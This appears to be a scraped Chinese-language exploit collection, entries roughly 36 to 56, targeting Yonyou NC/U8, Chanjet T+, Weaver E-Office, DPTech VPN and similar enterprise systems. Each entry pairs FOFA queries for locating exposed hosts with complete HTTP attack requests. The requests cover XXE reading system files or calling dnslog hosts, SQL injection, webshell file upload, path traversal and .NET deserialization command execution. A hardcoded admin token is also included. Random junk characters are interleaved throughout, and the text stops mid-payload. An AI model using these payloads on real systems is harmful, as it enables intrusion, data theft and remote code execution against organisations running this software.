/ p9 R0 d7 o% ?$ ~( U9 mUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info$ ?4 p. N3 k; o: N! e: R; U
Accept-Encoding: gzip, deflate
; ]/ I# g1 {- p7 R4 J8 HAccept: */*
# t2 y! N- X0 OConnection: close. x- O) s- H) k: t
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA' F7 h0 N f7 B, w4 l7 h/ K2 |$ t
Content-Length: 1900 Y7 ?" X* m8 X4 Q; G
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
# x" [' n. y& Q/ J; E
: I" G' Y3 `# v" n- a, p1 K--fd28cb44e829ed1c197ec3bc71748df0+ r) O) A1 ]" g8 |9 `5 ~
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
8 z. p# U, j3 e+ U! ?2 `6 J
P* p5 n" `# S) w$ f<%out.println(1111*1111);%>
) _' m3 B7 [2 B. B0 R& O! h) `--fd28cb44e829ed1c197ec3bc71748df0--
. w9 @( Y! [9 m4 w6 j* A. M: d) n8 \1 C. \& t5 p
: W. b2 u- j8 a* V" N, _! q C
36. 用友NC-Cloud soapFormat XXE
$ M% _0 i0 D! N3 b" m& Z4 cFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
- ~) F" i# k6 HPOST /uapws/soapFormat.ajax HTTP/1.11 x( @! k5 t( ~" {
Host: 192.168.40.130:8989; {2 g: u/ P" |7 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.04 ^ g6 m3 Y$ b; \! I: j1 G
Content-Length: 2635 k; H' z# ~0 p. ?. S* _! z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, q& _5 ?. V1 X2 BAccept-Encoding: gzip, deflate
* l# h% ]; F$ q" x AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 U. w% w( U/ [- K3 N# ]( q YConnection: close8 T5 Y* t% v* B. p3 |, `9 \& c
Content-Type: application/x-www-form-urlencoded
! G4 D7 ^/ z) N) E( Q8 TUpgrade-Insecure-Requests: 1
$ X0 k! v3 Q! b. _
6 A& g# p# s) p9 g( J1 _msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
& t" t) |- f1 K9 o
$ E; ]% X" [7 M* }1 o8 O' z
. d( v4 x4 h# V: @1 d0 y" P* q37. 用友NC-Cloud IUpdateService XXE
! Y" I" R9 ?# t' x, P1 R+ gFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"3 X# H6 H' {, J+ T# `
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
N, ^% y0 _) g9 R. c, z) Q tHost: 192.168.40.130:8989
* {7 J/ i% ]- qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
, Z. |9 i+ }: ]8 a7 bContent-Length: 421
0 i* _) I: |/ w1 I7 G& zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9, Y3 a. O1 p& G# }& F2 W5 M
Accept-Encoding: gzip, deflate
: R7 d9 \0 e9 Y: t' iAccept-Language: zh-CN,zh;q=0.9
- ~% r- ^, l6 _" @6 \Connection: close, T! e1 g0 k9 c! Y) K$ O
Content-Type: text/xml;charset=UTF-8
7 i& T. D3 ^. |SOAPAction: urn:getResult0 k6 V! L6 V+ Y p
Upgrade-Insecure-Requests: 1( @6 b$ R1 s8 ^7 x. f; T) O/ j
S! Z" R, U7 ] p( m9 z<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
3 g4 n6 ]% l: o5 x$ n% {7 W0 q<soapenv:Header/>/ a5 T5 e5 L ~! A' ~
<soapenv:Body>% P0 q! [! [- X
<iup:getResult>- }. a3 m+ |( W0 x
<!--type: string--> _" V9 F" Q, |0 O9 [7 n0 s+ j
<iup:string><![CDATA[
- Y; s+ J- c. K& |6 m& H<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
a! y: z& {- B% N/ t C; _<xxx/>]]></iup:string>( ^" {6 }$ E; l4 c" I
</iup:getResult># }/ _7 j% C' P
</soapenv:Body>6 Q+ H4 B6 Z2 S4 k8 m0 A4 g) g5 ^
</soapenv:Envelope>$ L) `1 `6 K" @1 h. O- w
! e1 f5 n6 z4 `$ S9 a8 N3 P- W
& _! P. H9 R8 m0 P* Z
/ Z, y q6 k) E" z3 _38. 用友U8 Cloud smartweb2.RPC.d XXE
T% E* g( P2 p `FOFA:app="用友-U8-Cloud"/ ]6 w: g" r2 d4 |$ P% M1 H2 |
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1- M Z. } R# `6 U
Host: 192.168.40.131:80887 s3 {( g2 t* q: q6 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
, X1 s$ y. A- l' {" LContent-Length: 260% k0 n; F, K/ B2 e! \3 ^. J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b34 C+ j8 ~/ F+ Z3 `2 E. Z
Accept-Encoding: gzip, deflate2 X5 N3 W; R/ ]9 f. W9 e
Accept-Language: zh-CN,zh;q=0.9
8 K" v, e* B8 x) z$ L, P# H1 SConnection: close0 J, e* |. Q# S4 r" U
Content-Type: application/x-www-form-urlencoded1 \8 h3 L/ e9 M0 t/ j3 R( `7 `
0 c4 p0 Z2 _2 Z( \ w
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
' t, l2 i- P0 T, ]7 S3 G+ G* R c% d# {# b* Z
: n m4 l% `( b1 w5 d' v1 R! q39. 用友U8 Cloud RegisterServlet SQL注入
7 O2 @, C; J& d+ r/ g: T7 \FOFA:title="u8c"
5 y( Z, w" P) E8 t' o0 LPOST /servlet/RegisterServlet HTTP/1.1# n9 [! E* [/ r& v- X3 f! _
Host: 192.168.86.128:80894 e$ Q& ?6 G. Q, C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
' q/ M9 ^' g0 n0 d: }! L8 [( }( PConnection: close( v) l% R9 Q8 @
Content-Length: 85
6 K- r6 [) ~% C! D7 DAccept: */*) u9 [! B$ D+ V5 n* a
Accept-Language: en
1 x) S) z" \/ rContent-Type: application/x-www-form-urlencoded
. g& ]& Z1 V# W$ v' E4 p5 TX-Forwarded-For: 127.0.0.1
1 P. |; T z/ w3 L$ ` @) kAccept-Encoding: gzip* o, S6 _; f' B" g) I# z* M h( _: y
* E/ R' \/ T3 Q8 C2 Yusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--$ a1 T; L! d9 M- u, x0 H" J
' v2 x! B2 i: E- T( F# T# P! p. c
0 R, t0 H2 |, w40. 用友U8-Cloud XChangeServlet XXE) s) c- Z9 J7 \4 {7 L* f5 b
FOFA:app="用友-U8-Cloud"
6 O0 i r6 Q; J& H- p: {+ i9 R- ^POST /service/XChangeServlet HTTP/1.1& Y4 [6 b' h0 B, \) n1 ]7 Z! \
Host: x.x.x.x* p' @) k+ A! Z7 M( w
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* f. v! u# Y7 [4 e2 AContent-Type: text/xml
' L3 X7 V$ ~& N q4 s: HConnection: close
# v) y8 R$ E3 P: I; e: V+ Q' M3 _8 H- f& Z. U- i( ?4 Y p" w
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
0 m' v' f. d% i" ~# W5 `/ f% m5 F
, o" e' Y1 o5 f- x: W
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
7 D% M. X6 d$ }9 j6 `FOFA:app="用友-U8-Cloud"
L( K& `" l# x: _9 n' ? u" [GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
+ Q2 [7 R" U; S- A0 iHost:. P7 Y. p9 [# S9 e8 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 P/ R$ X J) f9 U0 j" EContent-Type: application/json; A _+ J7 g6 j2 H; ?3 C( G
Accept-Encoding: gzip
' @* F! {, J3 ?" Z. A2 HConnection: close" e9 b: W, p/ G! l: I6 v1 L
7 ]9 S3 u5 y% Q& @, n1 n! C; _4 D+ E- X4 |2 r: c7 b
42. 用友GRP-U8 SmartUpload01 文件上传
j5 Z) h" H" _. PFOFA:app="用友-GRP-U8"
, K9 U7 ^- }+ `; @3 WPOST /u8qx/SmartUpload01.jsp HTTP/1.1! R; \! K0 D1 k* e
Host: x.x.x.x
, e" M5 T1 o$ Y5 U# k" ?Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
, A, ~& c4 u4 E, |$ BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.366 W' v0 N3 u* _$ j5 a" Z8 G
1 O3 q5 j3 N; B7 K3 e
PAYLOAD {) n9 H7 x" Q( q. r
1 e: e/ j2 f+ X; y$ Q/ [
# N* b; y0 L% J+ Jhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
. X6 c! u, }/ Q% g2 h6 M1 Y* ?/ H3 y# P0 d
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
% c, B, d5 }% h1 d' oFOFA:app="用友-GRP-U8"
, x" c) l( Z& y% }' v% }+ S8 e' h0 M& aPOST /services/userInfoWeb HTTP/1.1
4 `% O7 `% }4 n9 yHost: your-ip
; c( h7 B& x' z' ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36! h: m9 C1 d9 ?& X$ Z# h6 E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; ^8 o6 c! c" e
Accept-Encoding: gzip, deflate
1 \! l) K) y6 `Accept-Language: zh-CN,zh;q=0.9+ m; W6 a0 z1 ]3 W
Connection: close7 ]5 w$ o( `# `! b T$ K5 h
SOAPAction:7 u% W8 x! A- L; ^
Content-Type: text/xml;charset=UTF-8
! T8 v8 H' w* K* Q& X7 i8 p' u# V8 j, W
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
" ]7 b- I. ] m0 Q* h; q2 x: `( u <soapenv:Header/>
" }7 m1 ~0 x& Q! f$ v8 R <soapenv:Body>% T# W1 a* u& O7 e+ T" o! U
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">" R( M N" K0 D, ]4 ~
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
& P+ H) c' U5 q/ e: R- I: p+ c+ k </ser:getUserNameById>0 g# F$ e8 T' }) F3 T6 j# v4 {0 Q
</soapenv:Body>5 y1 O- m0 @' \
</soapenv:Envelope> H2 u$ w4 B D7 P
, P) G* T$ Y- p5 k/ X* j: r
+ R4 T M( C/ R44. 用友GRP-U8 bx_dj_check.jsp SQL注入
! O& H% q; C. I8 ?3 X: r! WFOFA:app="用友-GRP-U8"4 _; ^7 U4 T/ ~8 @6 W! w8 }
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1% V8 o9 I: v; H9 S( _/ q
Host: your-ip+ {6 {( l/ d# i: b1 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
+ c) M1 j$ m( JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 }' [0 Z/ j$ s8 XAccept-Encoding: gzip, deflate1 R1 P8 ]. n* o
Accept-Language: zh-CN,zh;q=0.98 L) _8 v( _# B' a
Connection: close
# D- X h% D/ B+ d$ j) `
6 J: Y- T. Z+ w: k# U. Z
' w) A' q# n9 U45. 用友GRP-U8 ufgovbank XXE
3 ]3 G2 f4 e) A0 i+ NFOFA:app="用友-GRP-U8"
9 a3 |2 P3 g; y: g/ @POST /ufgovbank HTTP/1.12 W) t* ]& Y# Y% L) [9 E
Host: 192.168.40.130:222
% |2 d9 W1 n, z* ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
" C5 Q2 c$ q* VConnection: close: X: _+ ^9 \0 ~& G7 m) Y" }
Content-Length: 161
6 t1 ?- o" M8 r, fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 s' v$ U8 Y; e8 k G3 M- s6 @/ [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" L) j# Y. N+ _/ e& Q7 k! zContent-Type: application/x-www-form-urlencoded$ m/ E* o+ Y! M
Accept-Encoding: gzip6 s _0 T J! y8 j* @
$ ~- ?, F. A3 L2 x' @reqData=<?xml version="1.0"?>
9 V: y3 z% g4 g6 h% }<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
6 Q! S$ M0 D5 q2 J
; n' z0 i3 }! S! _
1 P6 d( e2 C( Z. [1 u& j! x46. 用友GRP-U8 sqcxIndex.jsp SQL注入
: n/ z+ X( W& D# @$ I2 m! K& kFOFA:app="用友-GRP-U8"
! I- L1 M# I) H+ a& B/ r2 mGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
7 K& E6 D) m4 D, \1 \. fHost: your-ip8 u# r2 w% M: B! E* ?' ^' d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.361 F" T/ A: Z, F) d# |3 A3 a' o5 j' j8 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ Z. D& H! m" r/ g1 V" ~
Accept-Encoding: gzip, deflate
" p* q* ~% r* P( OAccept-Language: zh-CN,zh;q=0.9: T" e9 F4 [; w. B
Connection: close
, d* T5 q, h9 c4 G
; E9 E/ w( j$ S3 _: |* F* G8 O M( D7 N, W: i
47. 用友GRP A++Cloud 政府财务云 任意文件读取0 N4 D6 J0 e: B- v; I5 T. H1 m
FOFA:body="/pf/portal/login/css/fonts/style.css"
0 v1 Q' ~9 [- f9 K W, LGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1% N+ Q8 ]( y/ y0 L" a6 [9 |
Host: x.x.x.x
% b% T& F! a, ~7 _- kCache-Control: max-age=0" ~" M: u! }1 }" R& i
Upgrade-Insecure-Requests: 1
+ h) s* r+ {0 ` K6 |; N" t5 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 a; a5 _; m; h( {( x: }! {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: Z1 o/ \4 D' S
Accept-Encoding: gzip, deflate, br
4 h2 J! Y0 B! ]Accept-Language: zh-CN,zh;q=0.9
/ `5 R R) S8 ~6 T& S$ pIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
0 p6 z7 ^" J: l1 f$ |/ t( cConnection: close
8 L) b( m, g) ]8 \1 \( q
* ]+ [' }5 {+ S( R( [) R1 V. y, t: `; ~
! i N, S; A6 |7 |+ K+ Q% N
48. 用友U8 CRM swfupload 任意文件上传
! L; \. w: k6 X. b! S# R4 bFOFA:title="用友U8CRM"
& p, c9 i$ f( h. r4 D+ KPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1' l/ [1 A) t: {& L3 f
Host: your-ip' Y8 E% e$ ^2 S, e$ l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
3 n" z" n, e# `4 w3 i0 k/ V+ \0 i7 O) TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 F* w% c8 J3 M( c( I" G9 P( s4 ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
H- g4 [, Q9 IAccept-Encoding: gzip, deflate
& C. y$ G. d8 I" l$ ?Content-Type: multipart/form-data;boundary=----2695209672394068716424300668551 |0 C6 [2 Z9 P$ |; `. ~
------269520967239406871642430066855
" L' e9 G( y: g/ t% QContent-Disposition: form-data; name="file"; filename="s.php"
! A) L) _8 C+ y" X1231
- x4 r4 f' N6 vContent-Type: application/octet-stream, F+ l5 e( k% B3 E F: [1 u1 ^! J
------2695209672394068716424300668555 K1 y/ a4 o; A$ B) O
Content-Disposition: form-data; name="upload"
: \. I) E3 h* H: m2 G9 V m" q% T: tupload
; e7 w7 y* I) Z5 ~6 s& ^ H------269520967239406871642430066855--
l* K! c+ H! p& g V
- k# b" j0 Q& ~# v2 V
# x! V# }4 N' ^& ?49. 用友U8 CRM系统uploadfile.php接口任意文件上传; [, y3 Y2 f, ]" R6 p
FOFA:body="用友U8CRM"' P. `! q' q3 j% K
' C& h7 ]) T4 f* |
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
* T$ ^, Y/ L% Y4 w& f" s# JHost: x.x.x.x" f0 {" i/ s1 d6 S) Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 C, d( c$ B, Q: }, X! ^
Content-Length: 329 J: u2 J/ p. D4 X0 c- |- \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 X8 P& R6 s$ q) e
Accept-Encoding: gzip, deflate
1 x' _. M4 k6 k/ @: N5 T0 xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& n D& a' u' I, `6 \7 e$ i! ~6 W
Connection: close
7 c$ D* [" K. K' n& OContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w5 P x0 a6 C& e5 W; M
) {! X B: R3 \-----------------------------vvv3wdayqv3yppdxvn3w5 [- f. u' o p& j8 f
Content-Disposition: form-data; name="file"; filename="%s.php "1 V- w3 A0 S& o
Content-Type: application/octet-stream( Y% v0 l. r: w
/ I6 l1 N. O" M; K, n+ r
wersqqmlumloqa
2 u' Q4 t- G2 Z, m3 L" a, a-----------------------------vvv3wdayqv3yppdxvn3w7 H; r: N; y, @5 W
Content-Disposition: form-data; name="upload"/ L& S+ n9 s( D2 e/ N/ m6 t$ u* P6 A& S
" W# b" o& n W
upload5 P c% l! N2 V
-----------------------------vvv3wdayqv3yppdxvn3w--
1 k& U2 h! \+ n5 G t; [) ~. E `: n
4 S, H* [1 r4 l
http://x.x.x.x/tmpfile/updB3CB.tmp.php
4 Y- i* t, Y1 `* o2 l Y2 O! b
! @" Y+ h" B7 c- v' F3 X2 L50. QDocs Smart School 6.4.1 filterRecords SQL注入6 K5 C' U6 Z* c0 v8 c
FOFA:body="close closebtnmodal"1 U2 l _% F& U9 e) D1 b
POST /course/filterRecords/ HTTP/1.1
" G9 B V* n8 A: JHost: x.x.x.x
# J! O, ?- j1 M+ }! G% iUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ n) u7 u- R* X8 \Connection: close
8 n, B4 _, h8 A7 O8 }Content-Length: 224
+ Z' V1 X! [' f+ z' b8 uAccept: */*
5 A Y4 G2 A1 p8 ~/ _Accept-Language: en! n, Z) O8 U; P! ?
Content-Type: application/x-www-form-urlencoded; E4 `- }8 k9 I
Accept-Encoding: gzip
# X0 {4 i% V# I( ~% y4 h
$ y/ T- B5 X. {4 l) Bsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
. }' w. ]3 s0 p- Z- B5 ~* f b( n( A7 R4 u, Y/ n. k
1 ]: L" V3 _6 N8 q t
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入% {) `* C/ j6 r
FOFA:app="云时空社会化商业ERP系统"
; }7 _! r" W5 a6 ?7 Q; UGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
1 M8 o1 g) I' Q2 w* o. w! g& ]Host: your-ip* N, ^6 d3 i2 j+ K
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36+ ~3 E' y& m( A) F2 C5 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
4 R. t* X" n7 ZAccept-Encoding: gzip, deflate* x+ u- c. V2 M ^; ~: L
Accept-Language: zh-CN,zh;q=0.9
) K; e5 g* I1 ~, M& UConnection: close
( `9 t- ]" c, R$ o# W: P
3 g+ S$ l8 C! k1 t$ j) K8 G) h0 |# `- ~( ]7 T
52. 泛微E-Office json_common.php sql注入
, Y. r0 F7 s- fFOFA:app="泛微-EOffice"
1 i* G7 h" P K4 MPOST /building/json_common.php HTTP/1.1
4 K& k z9 \$ v1 j! GHost: 192.168.86.128:8097
1 c2 I% W0 x3 C m: V3 o' I1 oUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, z: L+ k1 {* d9 E
Connection: close
3 a; _; n7 F% \6 C- B& @Content-Length: 87# |5 p2 W9 R6 B; E% q4 ]
Accept: */*
' B7 Z0 j. ^. @ n8 O. [# aAccept-Language: en' u' j1 p; _2 V. o, O
Content-Type: application/x-www-form-urlencoded4 v7 r2 \2 Y" z! |) w+ Z
Accept-Encoding: gzip
3 y8 Z, H/ S: e2 v' A. W; S) E& T: `" x' ?
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
; s) e: {' v' Y( H7 I& T* a
0 H+ Z) o7 B. _6 p, P8 Z: F: { h# J: S. }+ j
53. 迪普 DPTech VPN Service 任意文件上传
; f4 }, a- h# ^! b0 pFOFA:app="DPtech-SSLVPN"
7 J2 B% p0 L8 P4 s- n7 |4 I/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
# W" Q% I* k' `( [5 s" E: ]: s! j
( x* o7 k" k% O* s2 f8 w6 k
54. 畅捷通T+ getstorewarehousebystore 远程代码执行 z- u) [" l6 Z P3 S
FOFA:app="畅捷通-TPlus"; ~; P" s% i% c6 i4 V/ V' ]* C: G/ s
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件 z l) x" c' W3 M; V( B$ k I1 G' j
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt". M+ \8 n- l4 n* r: _
9 P7 J" x* |' x9 G4 `( k- I
" N- [* M# r e1 r5 H( Z. s( p3 E完整数据包2 G# I6 S9 j+ t7 O- f4 M5 @7 I
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
/ g8 i. U. r! EHost: x.x.x.x8 G2 E3 p( u7 w2 V
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
& ]! G4 p5 X8 b( ?# kContent-Length: 5932 J9 P9 a3 j# X+ o. c! Q- ?
$ ]/ ?% E6 D1 M H! D" x
{+ Q7 M% {0 A. R4 o! W% J* X
"storeID":{, ^& @2 }4 D. \, Q2 F6 e
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
: O2 k; ?0 ]1 y# d; v! } "MethodName":"Start",- u9 H! d6 D J* |7 Q
"ObjectInstance":{* o& M3 ?( O- I6 b( [( J" u" [
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
2 n# f( d, w8 Q% W "StartInfo":{& a/ t9 A, E+ w7 z
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
$ A* Z" T# G" c. O$ Y: U "FileName":"cmd",+ r% d! Y9 u/ e
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
5 Y3 m4 _" n& H5 _) E$ E9 n# j; U }
8 h/ G: h+ m! `6 ^ }
% J4 u, S4 [# _& Q# \1 { }
2 n: ]! F' G' D: y0 X+ H) f# }1 G}
2 X: w9 u; p; R4 A) c& }) V3 }+ b
3 }7 d/ k$ p1 K/ f2 ?$ Q
" o% f( R, o' o; h8 u& ?, q; _1 f第二步,访问如下url# \) ?7 `/ E6 f2 T b9 m ]
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt) i# c& S, N+ H+ i" y& \
; F3 |/ h9 z7 t7 N \& W3 H4 k Q
9 {3 q3 J3 u* i& g
55. 畅捷通T+ getdecallusers信息泄露# V% A/ M+ o/ p! Q# D/ f* k& } s
FOFA:app="畅捷通-TPlus"
: C% O5 t! m5 o+ S& A+ Q4 ?第一步,通过
. J! J& n3 a0 C# }: A/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
0 \: h- a! L8 H第二步,利用获取到的Cookie请求- @/ R, U9 O% i4 w
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
! @, A+ L3 l8 k$ F3 j, a( k1 Q8 E$ G/ b
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE! l9 v5 ?; P$ @: T
FOFA: app="畅捷通-TPlus"
$ e9 ^% c# d+ B- a4 HPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
1 u4 A. N5 h7 _% YHost: x.x.x.x
2 h8 C% E. J, T: ~) S! _0 [, L# g! pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36& R& e6 e- X' | ~* S9 C
Content-Type: application/json
& \ o7 X# G, s- V5 k/ j2 a9 \" v1 a( a0 z6 e8 d
{ l) W. S4 m% K
"storeID":{
1 P" r2 I, P& r6 c& q "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",$ J- p' t( Q" `2 X1 O
